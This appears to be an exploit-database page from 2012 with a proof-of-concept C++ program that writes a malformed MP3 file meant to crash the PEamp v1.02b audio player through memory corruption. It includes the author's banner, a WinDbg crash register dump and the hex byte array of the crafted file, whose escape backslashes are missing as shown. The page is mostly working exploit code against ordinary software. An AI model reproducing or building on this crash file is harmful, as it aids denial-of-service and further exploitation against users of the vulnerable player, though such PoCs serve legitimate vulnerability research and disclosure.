Home / exploits

PDF

PEamp Memory Corruption

Posted on 12 June 2012

/*Title: PEamp (.mp3) Memmory Corruption PoC
Author: Ayrbyte
Link: http:www.softpedia.com/get/Multimedia/Audio/Audio-Players/mp3player.shtml
Versi: v1.02b
Tested on: Windows 7
Fb: facebook.com/Ayrbyte
Greetz To : all CREMY Family, and for all indonesian indonesian h4x0r

 ?? %% %% $$$$$ >> > :: ;;;;;;;;
 ?? ? %% %% $$ $$ || >> > :: ;; ;;
 ????? %%%% $$$$$ ||___ >>> ::::: ;;;;;;;
 ?? ?? %% $$$$ || || > :: ;;
 %%%%%%%% $$ $$ ||__|| >>>>> ::::: ;;;;;;;;
 ______________>>Ayrbyte<<_______________
 Gamerz From CREMY | CRazy Experience arMY

[bug]
eax=00040446 ebx=00000000 ecx=7324945c edx=00000000 esi=00040446 edi=00040446
eip=7322428e esp=0012fc4c ebp=0012fc4c iopl=0 nv up ei ng nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Windowssystem32WINMM.dll -
WINMM!DriverCallback+0x7bf:
7322428e 8b40d4 mov eax,dword ptr [eax-2Ch] ds:0023:0004041a=???????? <--CRASH
*/
//[Poc :]
#include <iostream>
using namespace std;
//Add and Play PoC.mp3 to PEamp then you will see MCI Error Message Box when you klik ok or close this MessageBox
//program will be CRASH
char _isi[] =
"x49x44x33x03x00x00x00x21x76x43x4Fx4Dx4Dx00x00x00"
"x00x22x00x00x00x65x6Ex67x00x4Dx41x44x45x20x42x59"
"x20x3Ax20x53x20x41x20x50x20x49x20x50x72x6Fx64x75"
"x63x74x69x6Fx6Ex73x54x52x43x4Bx00x00x00x02x00x00"
"x00x36x54x43x4Fx4Ex00x00x00x05x00x00x00x28x31x37"
"x29x54x41x4Cx42x00x00x00x0Dx00x00x00x43x49x54x59"
"x20x4Fx46x20x45x56x49x4Cx54x49x54x32x00x00x00x11"
"x00x00x00x30x36x20x53x65x69x7Ax65x20x54x68x65x20"
"x44x61x79x50x52x49x56x00x00x00x27x00x00x57x4Dx2F"
"x4Dx65x64x69x61x43x6Cx61x73x73x50x72x69x6Dx61x72"
"x79x49x44x00xBCx7Dx60xD1x23xE3xE2x4Bx86xA1x48xA4"
"x2Ax28x44x1Ex50x52x49x56x00x00x00x29x00x00x57x4D"
"x2Fx4Dx65x64x69x61x43x6Cx61x73x73x53x65x63x6Fx6E"
"x64x61x72x79x49x44x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x54x50x45x31x00x00x00x12x00"
"x00x00x41x56x45x4Ex47x45x44x20x53x45x56x45x4Ex46"
"x4Fx4Cx44x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00xFFxFBx92x44xFFx80x0BxF0x00x4Bx80x00x00"
"x08x00x00x09x70x00x00x01x00x00x01x2Ex00x00x00x20"
"x00x00x25xC0x00x00x04x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x54x41x47x30x36x20x53x65x69x7Ax65"
"x20x54x68x65x20x44x61x79x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x41x56x45x4Ex47x45x44x20x53x45"
"x56x45x4Ex46x4Fx4Cx44x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x43x49x54x59x20x4Fx46x20x45x56x49x4C"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x4Dx41x44x45x20x42x59x20x3Ax20"
"x53x20x41x20x50x20x49x20x50x72x6Fx64x75x63x74x69"
"x6Fx6Ex00x06x11";
int main(){
 FILE *_file;
 #define _namefile "PoC.mp3"
 _file = fopen(_namefile, "w");
 fputs(_isi, _file);
 fclose(_file);
 return 0;
}

 

TOP